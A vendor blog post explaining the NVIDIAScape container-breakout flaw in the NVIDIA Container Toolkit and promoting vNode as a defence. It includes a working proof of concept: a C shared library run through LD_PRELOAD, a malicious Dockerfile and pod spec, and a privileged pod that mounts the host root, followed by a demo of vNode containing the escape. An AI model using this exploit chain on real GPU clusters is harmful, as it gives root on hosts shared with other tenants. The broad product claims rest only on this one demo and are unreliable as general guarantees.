NVIDIAScape: How vNode prevents this container breakout without the need for VMs

Saiyam Pathak

July 21, 2025

6 Minute Read

This is some text inside of a div block.

Vulnerabilities happen. When Wiz researchers uncovered NVIDIAScape (CVE-2025-23266), a critical container breakout vulnerability impacting users of the NVIDIA Container Toolkit, NVIDIA acted quickly and provided a fix within versions 1.17.8 and 25.3.1 of the Container Toolkit and GPU Operator, respectively.

Let’s take a closer look at how this vulnerability worked, and how to collectively prevent similar risks in the future as AI and GPU infrastructure continues to evolve.

Many in our industry are now expressing the need for layering virtual machines on top of AI infrastructure rather than running containers directly on bare metal GPU nodes. While VMs offer very strong Kernel-level isolation, they also introduce significant drawbacks, including overhead, a reduced performance, and a lot of complexity when running state-of-the-art drivers and when hitting the limitations of GPU passthroughs.

We argue that there is a better, more container-native way to address these attach vectors. A path that does not force us to go back to virtual machines. In April 2025, we introduced vNode - a Kubernetes-native container-based isolation technology that uniquely combines approaches such as user namespaces, seccomp filters, filesystem emulation and more to create a secure sandbox for running user-defined containers. As soon as Wiz announced NVIDIAScape, we successfully verified that vNode protects against this vulnerability. In fact vNode protects against any similar container breakouts. Vulnerabilities such as this one rely on running a compromised container image with a modified Dockerfile and vNode was uniquely designed to protect against such attacks.

In our approach to vNode, we actually assume any image you run is compromised and hence we specifically designed vNode with such attack vectors in mind and made sure vNode protects against this entire class of vulnerabilities. Unlike the seccomp filters gVisor applies or the recently introduced user namespaces feature in Kubernetes, we don’t apply any security measures against a user-defined container. Instead, we run a vNode sandbox container, secure it using a plethora of security measures and then run the user-defined container inside of it. We assume that the user-defined container can be compromised and escaped of at any time but that means the attacker would just land in the virtual node which is our vNode sandbox container. And the attacker will now be stuck there. In an extremely hardened, minimal container with no tooling available to them and no way to manipulate the Dockerfile because this container is not user-defined. This successfully protects against Dockerfile manipulations like the one in NVIDIAScape.

The remainder of this article provides the following deep dives:

Explaining in-depth how NVIDIAScape works
A step-by-step walkthrough of a successful NVIDIAScape exploit (without vNode)
A step-by-step walkthrough of a failed NVIDIAScape exploit and an in-depth explanation of how vNode protects against this attack and other similar attack vectors

1. Understanding NVIDIAScape

This section provides a technical analysis focusing on the core concepts of OCI hooks, LD_PRELOAD, and the simplicity of an NVIDIAScape exploit.

1.1 Understanding OCI Hooks and the NVIDIA Container Toolkit's Role

The Open Container Initiative (OCI) specification provides a standard for container runtimes, including a powerful "hook" system. These hooks allow external tools to execute scripts at specific points in a container's lifecycle. The NVIDIA Container Toolkit (NCT) heavily leverages these hooks to connect containerized applications to the host's NVIDIA GPUs and drivers.

Specifically, the nvidia-ctk (NVIDIA Container Toolkit) registers a createContainer hook. This hook is executed as a privileged process on the host before the container's pivot_root operation, but after its mount namespace is created. This distinction is crucial: unlike prestart hooks, createContainer hooks inherit environment variables from the container image unless explicitly configured otherwise.

Here's a snippet of how such a hook might be defined:

"createContainer": [ { "path": "/usr/bin/nvidia-ctk", "args": ["nvidia-ctk", "hook", "enable-cuda-compat", "..."] }, ... ]

This means the nvidia-ctk process, running with elevated privileges, is susceptible to environment variables set within the container's Dockerfile.

1.2 Technical Breakdown: How Three Lines Led to Root

At its core, NVIDIAScape exploits a critical misconfiguration in how the NVIDIA Container Toolkit (NCT) handles OCI hooks, specifically the createContainer hook.

Privileged Hook Execution: The nvidia-ctk process, which performs vital setup for GPU access, runs as a privileged host process during the createContainer hook.
Environment Variable Inheritance: Unlike other hooks, the createContainer hook inherits environment variables directly from the container image. This means a malicious container can dictate the environment of a trusted host process.
Linus Environment Variable: Attackers leverage the LD_PRELOAD linux environment variable. By setting LD_PRELOAD to a path within the container, they force the privileged nvidia-ctk process to load and execute an arbitrary malicious shared library (.so file).
Working Directory Context: The createContainer hook executes with its working directory set to the container's root filesystem. This allows the malicious library to be referenced directly (e.g., /poc.so or /proc/self/cwd/poc.so), completing the exploit chain.

Let’s try to replicate this and see it in action.

2. Successful NVIDIAScape Attack without vNode

Step 1 - Create an EKS cluster

Start by creating a Kubernetes cluster with a GPU node pool. In order to simplify this we are using a single GPU node.

apiVersion: eksctl.io/v1alpha5 kind: ClusterConfig metadata: name: vcluster-gpu region: us-east-2 version: "1.32" tags: usage: sandbox owner: vcluster vpc: cidr: 10.1.0.0/16 autoAllocateIPv6: false hostnameType: resource-name clusterEndpoints: publicAccess: true privateAccess: true managedNodeGroups: - name: vcluster-gpu amiFamily: Ubuntu2404 desiredCapacity: 1 instanceTypes: - g4dn.xlarge ssh: allow: true publicKeyName: vcluster

Command to create EKS cluster using eksctl

eksctl create cluster --config-file eks-config-gpu.yaml

Now, get the kubeconfig file and export the KUBECONFIg variable

aws eks update-kubeconfig --region us-east-2 --name vcluster-gpu --kubeconfig ./vcluster-kubeconfig

Output:

kubectl get nodes NAME STATUS ROLES AGE VERSION i-067dddc81750368f4.us-east-2.compute.internal Ready <none> 11h v1.32.5

Step 2 - Create a poc.c file

Install vulnerable GPU operator

We need to make sure the the nvidia container toolkit version is <=v1.17.7

helm install gpu-operator nvidia/gpu-operator \ --version=v25.3.0 \ --namespace gpu-operator \ --create-namespace \ --set cdi.enabled=true

Output:

kubectl get pods -n gpu-operator NAME READY STATUS RESTARTS AGE gpu-feature-discovery-x8g4m 1/1 Running 0 11h gpu-operator-589b499765-5zvjs 1/1 Running 0 11h gpu-operator-node-feature-discovery-gc-7c7f68d5f4-z8qhj 1/1 Running 0 11h gpu-operator-node-feature-discovery-master-58588c6967-tbc2t 1/1 Running 0 11h gpu-operator-node-feature-discovery-worker-rsc2c 1/1 Running 0 11h nvidia-container-toolkit-daemonset-ll7f7 1/1 Running 0 11h nvidia-cuda-validator-sq7vb 0/1 Completed 0 11h nvidia-dcgm-exporter-f64lm 1/1 Running 0 11h nvidia-device-plugin-daemonset-99hws 1/1 Running 0 11h nvidia-driver-daemonset-sw5fp 1/1 Running 3 (11h ago) 11h nvidia-operator-validator-hwn4x 1/1 Running 0 11h

Check the toolkit version to be sure:

kubectl exec -n gpu-operator nvidia-container-toolkit-daemonset-ll7f7 -- nvidia-ctk --version Defaulted container "nvidia-container-toolkit-ctr" out of: nvidia-container-toolkit-ctr, driver-validation (init) NVIDIA Container Toolkit CLI version 1.17.5 commit: f785e908a7f72149f8912617058644fd84e38cde

As you can see version is 1.17.5 and is vulnerable.

Step 3 - Create a poc.c file

Start with the following:

#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> __attribute__((constructor)) void init() { // Ultra-minimal exploit - just create a marker file int fd = open("/owned", O_CREAT | O_WRONLY, 0644); if (fd >= 0) { write(fd, "EXPLOITED\n", 10); close(fd); } }

This code is a minimal C exploit designed to demonstrate unauthorized code execution inside a container. The program includes standard C libraries for input/output, memory management, file operations, and process control. The special __attribute__((constructor)) before the init function ensures that this function is executed automatically when the shared object or binary is loaded before main() is even called.

Inside init, the code tries to create (or open if it already exists) a file named /owned at the root of the filesystem, with write permissions. If successful, it writes the text “EXPLOITED” into this file and then closes it. The presence of this /owned file with the “EXPLOITED” message serves as a marker, signaling that the exploit was successfully executed and the attacker managed to run code on the host (or outside the intended sandbox). This is a classic technique used for quickly verifying privilege escalation or container breakout scenarios.

Step 4 - Compile for AMD64 architecture

docker run --platform linux/amd64 --rm -v $(pwd):/work -w /work ubuntu:20.04 bash -c "apt-get update && apt-get install -y gcc && gcc -shared -fPIC -o poc.so poc.c"

Step 5 - Create malicious Dockerfile and build the container

FROM ubuntu:20.04 ENV LD_PRELOAD=./poc.so COPY poc.so . CMD ["sleep", "3600"]

Build the container image and push to repo: you can use your own registry or ttl.sh

Command:

docker buildx build --platform linux/amd64 -t saiyam911/nvidia-escape-exploit:v1 --push .

Output:

[+] Building 4.8s (8/8) FINISHED docker-container:quizzical_shockley => [internal] load build definition from Dockerfile 0.0s => => transferring dockerfile: 162B 0.0s => [internal] load metadata for docker.io/library/ubuntu:20.04 0.3s => [internal] load .dockerignore 0.0s => => transferring context: 2B 0.0s => [internal] load build context 0.0s => => transferring context: 93B 0.0s => [1/2] FROM docker.io/library/ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2 0.0s => => resolve docker.io/library/ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2 0.0s => CACHED [2/2] ADD poc.so / 0.0s => exporting to image 4.4s => => exporting layers 0.0s => => exporting manifest sha256:7ac4ecf11489c030dbff703e993df1f2aa46bd847c1aacd635202425c 0.0s => => exporting config sha256:fdc6e68597444abd53892ca85f94d50894a033c79bf6adb203ac925d8af 0.0s => => exporting attestation manifest sha256:1bdbe0421380fd5ce88d74d4ff8accc4459f96ade487b 0.0s => => exporting manifest list sha256:8ce66a62f8f03de4ab786f3fe32b76b36c366f460c0e74b92a4c 0.0s => => pushing layers 2.5s => => pushing manifest for docker.io/saiyam911/nvidia-escape-exploit:v1@sha256:8ce66a62f8 1.9s => [auth] saiyam911/nvidia-escape-exploit:pull,push token for registry-1.docker.io 0.0s

Step 6 - Deploy the malicious pod requesting GPU resources

Create a file malicious-pod.yaml

apiVersion: v1 kind: Pod metadata: name: nvidia-escape-exploit spec: containers: - name: exploit-container image: saiyam911/nvidia-escape-exploit:v1 resources: limits: nvidia.com/gpu: 1 env: - name: LD_PRELOAD value: "./poc.so"

Command:

kubectl apply -f malicious-pod.yaml

Output:

demo ~ kubectl apply -f malicious-pod.yaml pod/nvidia-escape-exploit created demo ~ kubectl get pods NAME READY STATUS RESTARTS AGE nvidia-escape-exploit 1/1 Running 0 11s

Step 7 - Create a privileged pod and check if the file was created.

Create a file host-check-pod.yaml

apiVersion: v1 kind: Pod metadata: name: host-checker namespace: default spec: restartPolicy: Never hostNetwork: true hostPID: true containers: - name: checker image: ubuntu:20.04 securityContext: privileged: true volumeMounts: - name: host-root mountPath: /host command: ["sleep", "3600"] volumes: - name: host-root hostPath: path: /

Command:

kubectl apply -f host-check-pod.yaml

Output:

kubectl apply -f host-check-pod.yaml

pod/host-checker created

Check the file created

demo ~ kubectl exec host-checker -- ls /host/owned /host/owned demo ~ kubectl exec host-checker -- cat /host/owned EXPLOITED

This shows the exploited vulnerability and the file getting created on the host machine.

3. Defeating Container Breakouts with vNode

vNode is a multi-tenancy container runtime that provides strong isolation between workloads using Linux user namespaces and seccomp filters. It runs in Kubernetes environments and supports privileged workloads such as Docker-in-Docker and Kubernetes-in-Kubernetes. vNode ensures every container runs as a non-root user inside a sandbox.

Let’s try to understand that visually.

We have already seen what happens without vNode and how the malicious pod is able to create /owned files on the GPU host.

As you can see, with vNode the exploit and container breakout happens but on the virtual node, not on the actual GPU node.

Let’s try to see this in action: we will install vNode runtime and then rerun the same vulnerability pod with vnode as a runtime class.

You need to install vNode runtime and for that you need to have a platform host and platform access key. You can easily get that using vcluster.cloud

helm upgrade --install vnode-runtime vnode-runtime -n vnode-runtime --repo https://charts.loft.sh --create-namespace --set "config.platform.host=$PLATFORM_HOST" --set "config.platform.accessKey=$PLATFORM_ACCESS_KEY" --set config.platform.insecure=true

Now you will have a vNode specific runtime class.

kubectl get runtimeclass NAME HANDLER AGE nvidia nvidia 16h nvidia-cdi nvidia-cdi 13h nvidia-legacy nvidia-legacy 13h vnode vnode 28h vnode-launcher vnode-launcher 28h

Create a pod with vnode Runtime class

We will use the same pod and just add vNode runtime class(remove the /owned form the GPU instance manually first)

Create a file malicious-pod-vnode.yaml

apiVersion: v1 kind: Pod metadata: name: nvidia-escape-exploit-protected namespace: default spec: restartPolicy: Never runtimeClassName: vnode containers: - name: exploit-container image: saiyam911/nvidia-escape-exploit:v1 imagePullPolicy: Always resources: limits: nvidia.com/gpu: 1 requests: nvidia.com/gpu: 1

Output:

demo ~ kubectl apply -f malicious-pod-vnode.yaml pod/nvidia-escape-exploit-protected created demo ~ kubectl get pods NAME READY STATUS RESTARTS AGE host-checker 1/1 Running 0 40m nvidia-escape-exploit 0/1 Completed 0 43m nvidia-escape-exploit-protected 1/1 Running 0 14s

Now create the host-checker pod again and you won’t find any /owned created

Now create the host checker pod with vNode runtimeclass:

File - vnode-privileged.yaml

apiVersion: v1 kind: Pod metadata: name: vnode-host-checker namespace: default spec: restartPolicy: Never runtimeClassName: vnode hostNetwork: true hostPID: true containers: - name: checker image: ubuntu:20.04 securityContext: privileged: true volumeMounts: - name: host-root mountPath: /host command: ["sleep", "3600"] volumes: - name: host-root hostPath: path: /

Output:

demo ~ kubectl apply -f vnode-privileged.yaml pod/vnode-host-checker created demo ~ kubectl get pods NAME READY STATUS RESTARTS AGE host-checker 1/1 Running 0 87s nvidia-escape-exploit 0/1 Completed 0 46m nvidia-escape-exploit-protected 1/1 Running 0 3m32s vnode-host-checker 1/1 Running 0 5s demo ~ kubectl exec -it vnode-host-checker -- cat /host/owned EXPLOITED

As you can see that the attack was successful but only within the virtual node level, it cannot impact or access the host node. vNode was able to successfully prevent the malicious attack.

Conclusion

NVIDIAScape is just one critical vulnerability that leads to a container breakout. It’s by far not the first such attack and it won’t be the last. A radical answer is to layer in VMs for everything even when their drawbacks are clear in high-performance environments. An equally undesirable option is the reactive strategy of patching systems after vulnerabilities are identified; in the case of NVIDIAScape, you can upgrade the NVIDIA Container Toolkit to version 1.17.8, which contains the fix.

However, to ensure your workloads are more protected to run within a safe environment, vNode provides a third alternative that is more container-native than virtual machines and more proactive than trying to patch systems fast enough. vNode provides a lightweight virtual node layer that automatically creates a runtime class in your Kubernetes cluster. Using this vNode runtime allows you to wrap Kubernetes workloads in secure sandboxes, and if a container breakout does occur or even if a privileged pod is used, the attack is contained within this virtual node and never reaches the actual host.

Are you affected by this vulnerability or want to protect against similar attacks in the future? Talk to us! We’re happy to evaluate your environment and help you run a POC with vNode to see how easy it can be to get additional guards up for your AI infrastructure.

Kubernetes Insights

vCluster

Platform Engineering

NVIDIAScape: How vNode prevents this container breakout without the need for VMs

Table of Contents

1. Understanding NVIDIAScape

1.1 Understanding OCI Hooks and the NVIDIA Container Toolkit's Role

1.2 Technical Breakdown: How Three Lines Led to Root